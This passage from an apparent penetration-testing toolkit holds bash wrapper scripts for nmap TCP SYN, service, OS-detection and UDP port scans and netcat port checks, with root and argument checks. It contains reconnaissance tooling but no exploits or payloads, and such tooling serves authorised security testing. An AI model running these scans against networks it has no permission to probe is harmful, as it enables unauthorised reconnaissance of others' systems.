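# Usage: <script> <target IP or range> <comma-separated TCP ports>

# The script insists on root before running the SYN scan and OS detection.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 2 ]; then
    # Wrong usage is reported on stderr and fails the script.
    echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma." 1>&2
    exit 1
fi

target=$1
ports=$2
# Runs as root: do not let the target be taken as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Keep the output prefix usable when the target is a CIDR range.
out_prefix="tcp_services_${target//\//_}"

nmap -sS -vv -A --osscan-guess --version-all -Pn -p"$ports" -oA "$out_prefix" "$target"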
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
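# Service scan of nmap's 1000 most common TCP ports (--top-ports 1000): SYN
# scan (-sS) with -A (OS detection, version detection, default scripts,
# traceroute), --osscan-guess and --version-all, host discovery skipped (-Pn),
# open ports only (--open).
# Output: tcp_services_1000_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan and OS detection.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: a leading '-' would be read by nmap as an option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# CIDR '/' cannot be part of the output file name.
out_prefix="tcp_services_1000_${target//\//_}"

nmap -sS -vv -A --osscan-guess --version-all -Pn --top-ports 1000 --open -oA "$out_prefix" "$target"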
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-super-fast-scan-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2023 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
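# Fastest variant of the service scan for a known list of open TCP ports: SYN
# scan (-sS) with -A, --osscan-guess and --version-all, host discovery skipped
# (-Pn), timing -T4 plus --defeat-rst-ratelimit (do not slow down for targets
# that rate-limit RST replies).
# Output: tcp_services_<target>.* (-oA).
# Usage: <script> <target IP or range> <comma-separated TCP ports>

# The script insists on root before running the SYN scan and OS detection.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 2 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma." 1>&2
    exit 1
fi

target=$1
ports=$2
# Runs as root: refuse a target that nmap would parse as an option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Replace '/' so a CIDR target still yields a valid output file name.
out_prefix="tcp_services_${target//\//_}"

nmap -sS -vv -A --osscan-guess --version-all -Pn -p"$ports" -T4 --defeat-rst-ratelimit -oA "$out_prefix" "$target"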
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-delay-nc.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
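# TCP port check with netcat: -z connects without sending data, -v prints the
# result per port, -w 1 gives each connection attempt a 1-second timeout.
# NOTE(review): -w is a timeout, not a pause between ports (nc's -i sets an
# interval) — confirm which one the "delay" in the file name refers to.
# Usage: <script> <host> <port or port range>

if [ $# -ne 2 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide a host and a port range." 1>&2
    exit 1
fi

host=$1
ports=$2
# Neither positional value may be mistaken for an nc option.
if [[ $host == -* || $ports == -* ]]; then
    echo "The host and the port range must not start with '-'." 1>&2
    exit 1
fi

# Quoted so each value reaches nc as exactly one argument.
nc -w 1 -z -v "$host" "$ports"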
30 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-nc.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
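# TCP port check with netcat: -z connects without sending data, -n disables
# DNS lookups (the host must be given as an IP address), -v prints the result
# per port.
# Usage: <script> <host IP> <port or port range>

if [ $# -ne 2 ]; then
    # Wrong usage is reported on stderr and fails the script.
    echo "Please provide a host and a port range." 1>&2
    exit 1
fi

host=$1
ports=$2
# Neither positional value may be mistaken for an nc option.
if [[ $host == -* || $ports == -* ]]; then
    echo "The host and the port range must not start with '-'." 1>&2
    exit 1
fi

# Quoted so each value reaches nc as exactly one argument.
nc -z -n -v "$host" "$ports"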
30 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2022 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
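# Fast TCP SYN scan (-sS) of nmap's 1000 most common ports (--top-ports 1000):
# no host discovery (-Pn), no DNS (-n), timing -T4, open ports only (--open)
# with the state reason (--reason).
# Output: tcp_ports_1000_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: a leading '-' would be parsed as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Keep the -oA prefix a plain file name for CIDR targets.
out_prefix="tcp_ports_1000_${target//\//_}"

nmap -sS -n -Pn -vv --top-ports 1000 --open --reason -T4 -oA "$out_prefix" "$target"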
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-maxrate-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
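# Rate-limited TCP SYN scan (-sS) of nmap's 1000 most common ports with host
# discovery skipped (-Pn). --max-rate caps the number of packets nmap sends per
# second. Open ports only (--open), with the state reason (--reason).
# Output: tcp_ports_1000_maxrate_<target>.* (-oA).
# Usage: <script> <target IP or range> <max packets per second>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 2 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range and the max rate." 1>&2
    exit 1
fi

target=$1
max_rate=$2
# Runs as root: refuse a target that nmap would parse as an option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# '/' from CIDR notation would break the output file name.
out_prefix="tcp_ports_1000_maxrate_${target//\//_}"

# -Pn added: this is the "noping" variant, but the original command performed
# host discovery because the flag was missing.
nmap -sS -vv --top-ports 1000 -Pn --reason --open --max-rate "$max_rate" -oA "$out_prefix" "$target"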
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-maxrate.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
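# Rate-limited TCP SYN scan (-sS) of nmap's 1000 most common ports.
# --max-rate caps the number of packets nmap sends per second. Open ports only
# (--open), with the state reason (--reason).
# Output: tcp_ports_1000_maxrate_<target>.* (-oA).
# Usage: <script> <target IP or range> <max packets per second>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 2 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range and the max rate." 1>&2
    exit 1
fi

target=$1
max_rate=$2
# Runs as root: do not let the target be taken as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Replace '/' so a CIDR target yields a valid output file name.
out_prefix="tcp_ports_1000_maxrate_${target//\//_}"

# NOTE(review): -Pn skips host discovery although this file name has no
# "noping"; the plain top1000 script omits the flag — confirm which is intended.
nmap -sS -vv --top-ports 1000 -Pn --reason --open --max-rate "$max_rate" -oA "$out_prefix" "$target"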
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
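# TCP SYN scan (-sS) of nmap's 1000 most common ports (--top-ports 1000) with
# host discovery skipped (-Pn) and DNS disabled (-n), at default timing. Open
# ports only (--open), with the state reason (--reason).
# Output: tcp_ports_1000_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Wrong usage is reported on stderr and fails the script.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: a leading '-' would be parsed as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# CIDR '/' cannot be part of the output file name.
out_prefix="tcp_ports_1000_${target//\//_}"

nmap -sS -n -Pn -vv --top-ports 1000 --reason --open -oA "$out_prefix" "$target"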
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
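# TCP SYN scan (-sS) of nmap's 1000 most common ports (--top-ports 1000) with
# host discovery skipped (-Pn); DNS resolution stays enabled. Open ports only
# (--open), with the state reason (--reason).
# Output: tcp_ports_1000_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: refuse a target that nmap would parse as an option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Keep the output prefix a plain file name for CIDR targets.
out_prefix="tcp_ports_1000_${target//\//_}"

nmap -sS -vv --top-ports 1000 -Pn --reason --open -oA "$out_prefix" "$target"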
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-slow-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
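# Slow TCP SYN scan (-sS) of nmap's 1000 most common ports: no host discovery
# (-Pn), no DNS (-n), at least one second between probes to a host
# (--scan-delay 1s), and a host is abandoned after 30 minutes
# (--host-timeout 30m). At one probe per second 1000 ports take well over
# 16 minutes per host, so retransmissions can push a host past the timeout.
# Output: tcp_ports_1000_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: do not let the target be taken as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# '/' from CIDR notation would break the output file name.
out_prefix="tcp_ports_1000_${target//\//_}"

nmap -sS -n -Pn -vv --top-ports 1000 --reason --open --host-timeout 30m --scan-delay 1s -oA "$out_prefix" "$target"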
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-suprt-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2023 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
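# Fastest variant of the top-1000 TCP SYN scan (-sS --top-ports 1000): no host
# discovery (-Pn), no DNS (-n), timing -T4 and --defeat-rst-ratelimit (do not
# slow down for targets that rate-limit RST replies). Open ports only (--open),
# with the state reason (--reason).
# Output: tcp_ports_1000_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: a leading '-' would be parsed as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Replace '/' so a CIDR target yields a valid output file name.
out_prefix="tcp_ports_1000_${target//\//_}"

nmap -sS -n -Pn -vv --top-ports 1000 --open --reason -T4 --defeat-rst-ratelimit -oA "$out_prefix" "$target"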
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
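# TCP SYN scan (-sS) of nmap's 1000 most common ports (--top-ports 1000) with
# default host discovery, DNS resolution and timing. Open ports only (--open).
# Output: tcp_ports_1000_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Wrong usage is reported on stderr and fails the script.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: refuse a target that nmap would parse as an option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# CIDR '/' cannot be part of the output file name.
out_prefix="tcp_ports_1000_${target//\//_}"

nmap -sS -vv --top-ports 1000 --open -oA "$out_prefix" "$target"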
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top2000-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
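# TCP SYN scan (-sS) of nmap's 2000 most common ports (--top-ports 2000) with
# host discovery skipped (-Pn) and DNS disabled (-n). Open ports only (--open),
# with the state reason (--reason).
# Output: tcp_ports_2000_<target>.* (-oA).
# Usage: <script> <target IP or range>

# The script insists on root before running the SYN scan.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

target=$1
# Runs as root: do not let the target be taken as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# Keep the output prefix a plain file name for CIDR targets.
out_prefix="tcp_ports_2000_${target//\//_}"

nmap -sS -n -Pn -vv --top-ports 2000 --reason --open -oA "$out_prefix" "$target"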
35 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-scan-web-server.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
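# Service scan of a fixed list of ports commonly used by web servers and web
# consoles: SYN scan (-sS) with -A (OS detection, version detection, default
# scripts, traceroute), --osscan-guess and --version-all, host discovery
# skipped (-Pn). --open is not set, so closed and filtered ports are listed too.
# Output: tcp_web_server_<target>.* (-oA).
# Usage: <script> <web server host or IP>

# Ports probed; kept in one variable so the list is easy to audit.
web_ports="80,81,443,1080,3000,4000,5000,5601,6379,8000,8008,8080,8081,8181,8443,8888,9000,9080,9090,9200,9443,10000,15672"

# The script insists on root before running the SYN scan and OS detection.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

if [ $# -ne 1 ]; then
    # Usage errors go to stderr with a non-zero status.
    echo "Please provide the web server." 1>&2
    exit 1
fi

target=$1
# Runs as root: a leading '-' would be parsed as an nmap option.
if [[ $target == -* ]]; then
    echo "The target must not start with '-'." 1>&2
    exit 1
fi

# '/' (e.g. from a CIDR range) cannot be part of the output file name.
out_prefix="tcp_web_server_${target//\//_}"

nmap -sS -vv -A --osscan-guess --version-all -Pn -p"$web_ports" -oA "$out_prefix" "$target"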
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
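# Full-range UDP port scan (all 65535 ports), no host discovery, no DNS,
# aggressive timing.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_full_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# A CIDR range such as 10.0.0.0/24 contains "/", which nmap would read as a
# directory separator in the -oA base name; map it to "_".
out_base="udp_ports_full_${1//\//_}"

# -n: no DNS resolution, -Pn: treat every host as up, -p-: all ports,
# --open: list only open (or possibly open) ports, -T4: aggressive timing.
# Quoting keeps nmap wildcard targets (e.g. 10.0.*.1) away from shell globbing.
nmap -sU -n -Pn -vv -p- --reason --open -T4 -oA "$out_base" "$1"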
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
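# Full-range UDP port scan with nmap's normal host discovery and without
# DNS resolution.
#
# Arguments:
#   $1  target IP address or IP range.
#
# Output: udp_ports_full_<target>.{nmap,gnmap,xml} in the current directory.

# The UDP scan (-sU) needs raw-socket privileges.
if [[ $EUID -ne 0 ]]; then
    echo "Please run this script as root." 1>&2
    exit 1
fi

# Usage errors go to stderr with a non-zero status.
if [ $# -ne 1 ]; then
    echo "Please provide the target IP address or an IP range." 1>&2
    exit 1
fi

# "/" from a CIDR range must not end up in the output file name.
out_base="udp_ports_full_${1//\//_}"

# No -Pn here: hosts that fail discovery are skipped rather than scanned.
nmap -sU -n -vv -p- --reason --open -oA "$out_base" "$1"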
35 |
--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-noping-nodns.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
